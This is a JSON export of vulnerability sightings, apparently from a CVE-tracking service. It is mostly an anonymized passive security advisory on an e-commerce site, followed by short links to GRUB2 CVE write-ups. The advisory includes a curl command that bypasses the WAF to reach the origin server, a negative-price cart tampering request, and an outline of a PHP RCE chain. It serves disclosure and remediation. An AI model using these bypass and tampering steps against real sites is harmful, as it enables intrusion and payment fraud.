`cart_session` cookie missing Secure flag\n\n**Evidence:** `Set-Cookie: cart_session=...; path=/; httponly; samesite=lax` (no `secure` flag despite HTTPS-only deployment)\n\n**Remediation:** In platform config: set `'cookie_secure' => true`.\n\n---\n\n#### F-006 \u00b7 `PUT /cart` accepts any value without authentication\n\n**Evidence:** `PUT /cart` with `{\"product_id\":1,\"quantity\":-1,\"price\":-1000}` returns 200 OK\n\n**Impact:** If session ID is known (via XSS leak or session fixation), attacker can modify victim's cart, potentially changing prices at checkout.\n\n**Remediation:** Add authentication middleware to cart mutations + validate `quantity > 0` and `price >= server-set-price` server-side.\n\n---\n\n#### F-007 \u00b7 SSO postMessage redirect handler has no URL allowlist\n\n**Evidence:** SSO client library (in `easyid.js`-equivalent):\n```js\nwindow.addEventListener('message', message => {\n    if (!message.isTrusted) return;\n    if (message.origin != 'https://sso-provider.example') return;\n    if (message.data.type != 'sso:redirect') return;\n    window.location.href = message.data.data.redirect;  // NO URL VALIDATION\n});\n```\n\nWhile the origin and isTrusted checks are correct, the redirect URL is never validated. If the SSO provider is compromised, attacker can navigate iframe to any URL.\n\n**Remediation:**\n```js\nconst allowed = new Set([window.location.origin, 'https://target-a.example']);\nif (!allowed.has(new URL(message.data.data.redirect).origin)) return;\n```\n\n---\n\n### LOW severity (selected)\n\n- **X-Powered-By header** leaks PHP version \u2192 `expose_php = Off`\n- **SSO setCookie** missing Secure/HttpOnly \u2192 update to `Secure;SameSite=Strict`\n- **IDOR via /product/{id}** returns 200 with 404-template on non-existent IDs \u2192 use `abort(404)`\n- **AJAX handler enumeration** via error message reflection \u2192 log details server-side only\n- **Missing DMARC record** \u2192 add `_dmarc` TXT with `v=DMARC1; p=reject; rua=mailto:security@example.com`\n- **Payment form without `target=_blank`** \u2192 vulnerable to reverse tabnabbing\n\n---\n\n### INFO\n\n- **Minecraft server offline** at port 25565 (operational issue, likely crashed Java process)\n- **Commercial fingerprinting library deployed** without explicit GDPR consent banner\n\n---\n\n## Coverage\n\n### Tested\n- \u2705 DNS recon (A, AAAA, NS, MX, TXT, reverse)\n- \u2705 Subdomain enumeration (100+ subdomains)\n- \u2705 HTTP fingerprint (Server, X-Powered-By, headers)\n- \u2705 TLS certificate analysis\n- \u2705 Security headers audit\n- \u2705 Cookie security analysis\n- \u2705 Method tampering (PUT/PATCH/DELETE probes, no mutation)\n- \u2705 AJAX handler enumeration\n- \u2705 IDOR via GET request pattern\n- \u2705 CORS configuration\n- \u2705 Cloudflare bypass proof-of-concept (--resolve, read-only)\n- \u2705 Static analysis of HTML/JS/CSS\n- \u2705 FingerprintJS privacy audit\n- \u2705 OAuth/SSO flow analysis\n- \u2705 Payment flow analysis (form targets, postMessage)\n\n### Not tested (out of scope for passive engagement)\n- \u274c Active exploitation (CVE PoC, RCE attempts)\n- \u274c SQLi / XSS submit attempts\n- \u274c File upload bypass\n- \u274c Brute-force on auth endpoints\n- \u274c Modifying site state\n\n## Remediation summary\n\n| Priority | Action | Estimated effort |\n|----------|--------|------------------|\n| **URGENT** | Upgrade PHP 7.4 \u2192 8.3+ | 1 week |\n| **URGENT** | Add security headers (CSP, HSTS, XFO) | 1 hour |\n| **URGENT** | Block origin from non-Cloudflare IPs | 1 hour |\n| **HIGH** | Fix PUT /cart auth + validation | 1 day |\n| **HIGH** | SSO redirect URL allowlist | 1 hour |\n| **MEDIUM** | Fix all cookie flags (Secure, HttpOnly) | 4 hours |\n| **MEDIUM** | Add DMARC record | 30 minutes |\n| **MEDIUM** | Migrate origin to Cloudflare Tunnel | 1 day |\n| **LOW** | Remove X-Powered-By, fix IDOR, add CSRF | 1 day |\n| **OPS** | Restart Minecraft server | 30 minutes |\n| **GDPR** | Add consent banner for fingerprinting | 1 day |\n\n## Disclosure process\n\nThis report was prepared in accordance with responsible disclosure principles:\n- All findings obtained through passive reconnaissance (HTTP GET, public DNS, static analysis)\n- No active exploitation performed\n- No state mutation attempted\n- 90-day disclosure window offered to vendor\n\n---\n\n*Generated for security research portfolio. All identifying information anonymized.*\n", "creation_timestamp": "2026-06-26T23:19:37.445975Z"}, {"uuid": "bbdedf3b-b095-4300-b6b1-c2e9f961f600", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "seen", "source": "https://gist.github.com/ivanys2244-sys/cd3c2a40e041f4b33eddc1479dd0d4f9", "content": "# Security Advisory \u2014 Target E-commerce Platform\n\n> **Note:** This is an anonymized sample report for portfolio purposes. All identifying information (domain, IP addresses, third-party service names) has been replaced with placeholders. The original report was sent to the affected vendor through responsible disclosure channels.\n\n## Summary\n\nPassive security assessment of a Russian-language e-commerce platform running behind a two-layer WAF (Cloudflare + DDoS-Guard). The platform sells in-game currency and ranks for a Minecraft server. The backend is hosted on shared infrastructure and runs a customized SaaS shopping cart (EasyDonate) on top of OctoberCMS.\n\n**16 findings identified** during passive reconnaissance:\n- **3 HIGH** \u2014 outdated PHP version, missing security headers, origin server reachable via DNS bypass\n- **5 MEDIUM** \u2014 cookie security issues, missing authentication on cart mutations, open redirect in SSO handler\n- **6 LOW** \u2014 information disclosure, missing cookie flags\n- **2 INFO** \u2014 operational observations, GDPR considerations\n\n**Critical chain:** outdated PHP 7.4 on origin + DNS resolution bypass = potential RCE if CVE-2024-4577 or CVE-2024-1874 is exploitable on this configuration.\n\n## Architecture\n\n```\nINTERNET \u2500\u25ba HTTPS \u2500\u25ba Cloudflare Edge (203.0.113.10, CF-ASN)\n                    \u2193 HTTPS\n                  DDoS-Guard Proxy (transparent, rate-limit + WAF)\n                    \u2193 HTTPS / unix-socket\n                  ORIGIN SERVER (203.0.113.42)\n                    nginx + PHP 7.4.33 + OctoberCMS + EasyDonate\n                    + Minecraft server :25565 (same host)\n```\n\n## Network reconnaissance\n\n### DNS\n- A: 203.0.113.10 (Cloudflare edge)\n- AAAA: none (no IPv6)\n- NS: jim.ns.cloudflare.com, kay.ns.cloudflare.com\n- MX: none (no mail server)\n- TXT: \"v=spf1 -all\" (strict SPF, prevents spoofing)\n- DMARC: **not configured** (recommendation below)\n\n### Subdomain enumeration\nWildcard A-record `*.target-a.example` resolves to origin IP 203.0.113.42 for all subdomains (admin, dev, git, cp, etc.). This is a reconnaissance shortcut for attackers and a DNS rebinding attack surface.\n\n### Reverse-IP\nThe Minecraft server (203.0.113.42:25565) is on the same physical host as the web application. Compromise of one = compromise of both.\n\n## Findings\n\n### HIGH severity\n\n#### F-001 \u00b7 PHP 7.4.33 (EOL since 2022-11-28)\n\n**CVSS:** 7.5 | **CWE:** CWE-1104 (Use of Unmaintained Third Party Components)\n\n**Evidence:** `X-Powered-By: PHP/7.4.33` header visible when reaching the origin directly.\n\n**Impact:** All PHP 7.4 CVEs are unpatched. Most critical:\n- **CVE-2024-4577** (CVSS 9.8) \u2014 PHP-CGI argument injection \u2192 unauthenticated RCE\n- **CVE-2024-1874** (CVSS 9.4) \u2014 PHP-FPM `SCRIPT_FILENAME` LFI \u2192 RCE\n- Multiple XSS, DoS, information disclosure CVEs\n\nThe site processes payment data, which compounds the risk.\n\n**Remediation:**\n1. Upgrade to PHP 8.3+ (EasyDonate 5.x supports 8.1+)\n2. Test in staging environment before production cutover\n3. Subscribe to PHP security advisories: https://www.php.net/security/\n\n---\n\n#### F-002 \u00b7 Missing critical security headers\n\n**CVSS:** 7.4 | **CWE:** CWE-693 (Protection Mechanism Failure)\n\n**Evidence:** All security headers NOT SET in HTTP responses.\n\n**Missing headers:**\n- `Content-Security-Policy` \u2014 no defense against XSS / inline scripts\n- `X-Frame-Options` \u2014 site can be embedded in iframe (clickjacking on /payment)\n- `Strict-Transport-Security` \u2014 SSL-stripping MITM possible\n- `X-Content-Type-Options` \u2014 MIME-sniffing on uploaded avatars\n- `Referrer-Policy` \u2014 leaks full URL in Referer\n- `Permissions-Policy` \u2014 no restriction on camera/mic/geolocation\n\n**Impact:** Any future XSS vulnerability = full account takeover. Clickjacking on payment forms = financial damage. SSL-stripping = session theft.\n\n**Remediation (nginx):**\n```nginx\nadd_header Strict-Transport-Security \"max-age=31536000; includeSubDomains\" always;\nadd_header X-Frame-Options \"SAMEORIGIN\" always;\nadd_header X-Content-Type-Options \"nosniff\" always;\nadd_header Referrer-Policy \"strict-origin-when-cross-origin\" always;\nadd_header Permissions-Policy \"camera=(), microphone=(), geolocation=()\" always;\nadd_header Content-Security-Policy \"default-src 'self'; script-src 'self' 'unsafe-inline' https://cdn.easydonate-equivalent.example https://cdnjs.cloudflare.com; style-src 'self' 'unsafe-inline' https://cdnjs.cloudflare.com; img-src 'self' data: https:; font-src 'self' https://cdnjs.cloudflare.com; frame-src https://sso-provider.example; connect-src 'self' https://api.easydonate-equivalent.example\" always;\n```\n\n---\n\n#### F-003 \u00b7 Origin server reachable via DNS resolution bypass\n\n**CVSS:** 7.5 | **CWE:** CWE-284 (Improper Access Control)\n\n**Evidence:**\n```bash\n$ curl --resolve target-a.example:443:203.0.113.42 -I https://target-a.example/\nHTTP/1.1 200 OK\nServer: ddos-guard\nX-Powered-By: PHP/7.4.33\n```\n\n**Description:** A simple `--resolve` flag in curl bypasses Cloudflare DNS and connects directly to the origin IP. DDoS-Guard does not block this because the connection appears to come from a legitimate client IP. Attackers can:\n1. Discover origin IP via DNS enumeration (subdomain brute force shows origin for 100+ subdomains)\n2. Bypass Cloudflare security policies (rate limiting, WAF rules, IP geo-blocking)\n3. Reach the origin's PHP 7.4 stack directly (compounds F-001)\n\n**Remediation:**\n1. **Primary:** Migrate origin to **Cloudflare Tunnel** (cloudflared) \u2014 origin has no public IP, only Cloudflare can reach it\n2. **Alternative:** Configure DDoS-Guard to allowlist ONLY Cloudflare IP ranges: https://www.cloudflare.com/ips/\n3. **Quick fix:** Block origin IP from non-Cloudflare sources at the hosting provider firewall\n\n---\n\n### MEDIUM severity (selected)\n\n#### F-004 \u00b7 DDoS-Guard cookies leak client IP\n\nThe `__ddg9_` cookie stores the client IP in plaintext. `__ddg8_` and `__ddg10_` are missing `Secure` and `HttpOnly` flags.\n\n**Remediation:** DDoS-Guard supports cookie hardening options \u2014 enable Secure flag for all cookies.\n\n---\n\n#### F-005 \u00b7 `cart_session` cookie missing Secure flag\n\n**Evidence:** `Set-Cookie: cart_session=...; path=/; httponly; samesite=lax` (no `secure` flag despite HTTPS-only deployment)\n\n**Remediation:** In platform config: set `'cookie_secure' => true`.\n\n---\n\n#### F-006 \u00b7 `PUT /cart` accepts any value without authentication\n\n**Evidence:** `PUT /cart` with `{\"product_id\":1,\"quantity\":-1,\"price\":-1000}` returns 200 OK\n\n**Impact:** If session ID is known (via XSS leak or session fixation), attacker can modify victim's cart, potentially changing prices at checkout.\n\n**Remediation:** Add authentication middleware to cart mutations + validate `quantity > 0` and `price >= server-set-price` server-side.\n\n---\n\n#### F-007 \u00b7 SSO postMessage redirect handler has no URL allowlist\n\n**Evidence:** SSO client library (in `easyid.js`-equivalent):\n```js\nwindow.addEventListener('message', message => {\n    if (!message.isTrusted) return;\n    if (message.origin != 'https://sso-provider.example') return;\n    if (message.data.type != 'sso:redirect') return;\n    window.location.href = message.data.data.redirect;  // NO URL VALIDATION\n});\n```\n\nWhile the origin and isTrusted checks are correct, the redirect URL is never validated. If the SSO provider is compromised, attacker can navigate iframe to any URL.\n\n**Remediation:**\n```js\nconst allowed = new Set([window.location.origin, 'https://target-a.example']);\nif (!allowed.has(new URL(message.data.data.redirect).origin)) return;\n```\n\n---\n\n### LOW severity (selected)\n\n- **X-Powered-By header** leaks PHP version \u2192 `expose_php = Off`\n- **SSO setCookie** missing Secure/HttpOnly \u2192 update to `Secure;SameSite=Strict`\n- **IDOR via /product/{id}** returns 200 with 404-template on non-existent IDs \u2192 use `abort(404)`\n- **AJAX handler enumeration** via error message reflection \u2192 log details server-side only\n- **Missing DMARC record** \u2192 add `_dmarc` TXT with `v=DMARC1; p=reject; rua=mailto:security@example.com`\n- **Payment form without `target=_blank`** \u2192 vulnerable to reverse tabnabbing\n\n---\n\n### INFO\n\n- **Minecraft server offline** at port 25565 (operational issue, likely crashed Java process)\n- **Commercial fingerprinting library deployed** without explicit GDPR consent banner\n\n---\n\n## Coverage\n\n### Tested\n- \u2705 DNS recon (A, AAAA, NS, MX, TXT, reverse)\n- \u2705 Subdomain enumeration (100+ subdomains)\n- \u2705 HTTP fingerprint (Server, X-Powered-By, headers)\n- \u2705 TLS certificate analysis\n- \u2705 Security headers audit\n- \u2705 Cookie security analysis\n- \u2705 Method tampering (PUT/PATCH/DELETE probes, no mutation)\n- \u2705 AJAX handler enumeration\n- \u2705 IDOR via GET request pattern\n- \u2705 CORS configuration\n- \u2705 Cloudflare bypass proof-of-concept (--resolve, read-only)\n- \u2705 Static analysis of HTML/JS/CSS\n- \u2705 FingerprintJS privacy audit\n- \u2705 OAuth/SSO flow analysis\n- \u2705 Payment flow analysis (form targets, postMessage)\n\n### Not tested (out of scope for passive engagement)\n- \u274c Active exploitation (CVE PoC, RCE attempts)\n- \u274c SQLi / XSS submit attempts\n- \u274c File upload bypass\n- \u274c Brute-force on auth endpoints\n- \u274c Modifying site state\n\n## Remediation summary\n\n| Priority | Action | Estimated effort |\n|----------|--------|------------------|\n| **URGENT** | Upgrade PHP 7.4 \u2192 8.3+ | 1 week |\n| **URGENT** | Add security headers (CSP, HSTS, XFO) | 1 hour |\n| **URGENT** | Block origin from non-Cloudflare IPs | 1 hour |\n| **HIGH** | Fix PUT /cart auth + validation | 1 day |\n| **HIGH** | SSO redirect URL allowlist | 1 hour |\n| **MEDIUM** | Fix all cookie flags (Secure, HttpOnly) | 4 hours |\n| **MEDIUM** | Add DMARC record | 30 minutes |\n| **MEDIUM** | Migrate origin to Cloudflare Tunnel | 1 day |\n| **LOW** | Remove X-Powered-By, fix IDOR, add CSRF | 1 day |\n| **OPS** | Restart Minecraft server | 30 minutes |\n| **GDPR** | Add consent banner for fingerprinting | 1 day |\n\n## Disclosure process\n\nThis report was prepared in accordance with responsible disclosure principles:\n- All findings obtained through passive reconnaissance (HTTP GET, public DNS, static analysis)\n- No active exploitation performed\n- No state mutation attempted\n- 90-day disclosure window offered to vendor\n\n---\n\n*Generated for security research portfolio. All identifying information anonymized.*\n", "creation_timestamp": "2026-06-27T00:00:58.488160Z"}, {"uuid": "31c26d1f-3cb2-467f-acb8-8658226951bd", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45774", "type": "seen", "source": "https://bsky.app/profile/kriptabiz.bsky.social/post/3mphomde5nt2d", "content": "\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c CVE-2024-45774 \u0432 GRUB2: \u043a\u0430\u043a \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0435 JPEG-\u0444\u0430\u0439\u043b\u044b \u0443\u0433\u0440\u043e\u0436\u0430\u044e\u0442 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 \u0441\u0438\u0441\u0442\u0435\u043c\n\n\n\nhttps://kripta.biz/posts/2614F098-E49B-4097-8353-9013ECC5D123", "creation_timestamp": "2026-06-29T23:51:54.490806Z"}, {"uuid": "8c0da8df-a6d1-4e40-bb36-f7bc4cdcba11", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45779", "type": "seen", "source": "https://bsky.app/profile/kriptabiz.bsky.social/post/3mphomxdnab2t", "content": "\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c CVE-2024-45779 \u0432 GRUB2: \u0443\u0433\u0440\u043e\u0437\u0430 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 \u0438 \u0441\u043f\u043e\u0441\u043e\u0431\u044b \u0437\u0430\u0449\u0438\u0442\u044b\n\n\n\nhttps://kripta.biz/posts/9282C5C0-C9BD-4B56-976A-C22B5C093FB3", "creation_timestamp": "2026-06-29T23:52:15.390092Z"}, {"uuid": "0911f5cf-9f2a-49d2-a017-4982c8f3c178", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45779", "type": "seen", "source": "https://bsky.app/profile/qiancx.bsky.social/post/3mphomzkpjy2w", "content": "\u6df1\u5ea6\u89e3\u6790GRUB2\u4e2dBFS\u6587\u4ef6\u7cfb\u7edf\u9a71\u52a8\u7684\u6574\u6570\u6ea2\u51fa\u6f0f\u6d1e(CVE-2024-45779)\u53ca\u5176\u5b89\u5168\u5f71\u54cd\n\n\n\nhttps://qian.cx/posts/B037A867-DE73-4F17-9679-B7D3A43D4A0B", "creation_timestamp": "2026-06-29T23:52:17.812874Z"}, {"uuid": "f2e6b302-c48e-4d10-b3cb-2ced042d6acc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45776", "type": "seen", "source": "https://bsky.app/profile/kriptabiz.bsky.social/post/3mphos7uhel27", "content": "\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c CVE-2024-45776 \u0432 GRUB2: \u0443\u0433\u0440\u043e\u0437\u0430 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 \u0438 \u0441\u043f\u043e\u0441\u043e\u0431\u044b \u0437\u0430\u0449\u0438\u0442\u044b\n\n\n\nhttps://kripta.biz/posts/68BB647D-22C2-46FD-8EC1-06D69A17B4D7", "creation_timestamp": "2026-06-29T23:55:12.238077Z"}, {"uuid": "fdd25340-c5e5-4e90-a543-3b12c88b034d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45777", "type": "seen", "source": "https://bsky.app/profile/kriptabiz.bsky.social/post/3mphotljv4l22", "content": "\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c CVE-2024-45777 \u0432 GRUB2: \u0443\u0433\u0440\u043e\u0437\u0430 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 \u0438 \u0441\u043f\u043e\u0441\u043e\u0431\u044b \u0437\u0430\u0449\u0438\u0442\u044b\n\n\n\nhttps://kripta.biz/posts/5B654880-338C-46E2-8277-29A91E7DF807", "creation_timestamp": "2026-06-29T23:55:57.933950Z"}, {"uuid": "efba3fe1-6b5e-46d2-91f1-1d3470d4ef54", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-45778", "type": "seen", "source": "https://bsky.app/profile/kriptabiz.bsky.social/post/3mphoudcda22w", "content": "\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c CVE-2024-45778: \u0443\u0433\u0440\u043e\u0437\u0430 \u043f\u0435\u0440\u0435\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u0441\u0442\u0435\u043a\u0430 \u0432 \u0444\u0430\u0439\u043b\u043e\u0432\u043e\u0439 \u0441\u0438\u0441\u0442\u0435\u043c\u0435 BFS\n\n\n\nhttps://kripta.biz/posts/FD6E6272-B4A4-44B8-93CD-4B18A60AF407", "creation_timestamp": "2026-06-29T23:56:23.045262Z"}]}